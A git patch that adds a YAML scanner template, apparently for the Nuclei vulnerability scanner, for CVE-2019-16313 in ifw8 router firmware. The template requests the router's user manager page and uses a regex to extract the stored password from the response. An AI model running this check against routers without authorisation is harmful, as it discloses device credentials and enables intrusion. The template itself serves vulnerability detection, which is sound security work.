From 73f37aa7c5bf3b111788d14e2f8397a548ae9ef8 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 14 Aug 2021 18:37:50 +0700 Subject: [PATCH] Create CVE-2019-16313.yaml --- cves/2019/CVE-2019-16313.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2019/CVE-2019-16313.yaml diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml new file mode 100644 index 0000000000..5fee4615b0 --- /dev/null +++ b/cves/2019/CVE-2019-16313.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-16313 + +info: + name: ifw8 Router ROM v4.31 allows credential disclosure + author: pikpikcu + severity: high + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 + tags: cve,cve2019,tvt,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/action/usermanager.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'user' + - 'pwd' + part: body + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'pwd : "([A-Za-z0-9=]+)",'